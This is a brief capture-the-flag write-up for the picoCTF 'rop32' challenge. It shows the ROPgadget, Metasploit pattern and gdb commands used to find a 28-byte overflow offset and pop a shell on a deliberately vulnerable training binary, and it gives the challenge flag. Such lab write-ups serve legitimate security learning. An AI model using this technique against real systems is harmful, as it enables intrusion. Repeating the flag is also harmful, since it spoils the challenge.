ctftime

My solutions for various CTF challenges

View on GitHub

rop32

Binary Exploitation - Points: 400

Can you exploit the following program to get a flag?

vuln

vuln.c

Use ROPgadget to find a ROP chain that spawns a shell.

$ ROPgadget --binary vuln --ropchain --badbytes "0a"

Find the offset where the overflowing buffer writes to the RIP. Create a pattern and use it in gdb to find the address where the SEGFAULT occurs.

$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413961
  [*] Exact match at offset 28

Execute the ROP chain from ROPgadget with the correct padding of 28 to get a shell that lets you cat flag.txt.

$ (python2 sol.py; cat) | ./vuln

flag: picoCTF{rOp_t0_b1n_sH_01a585a7}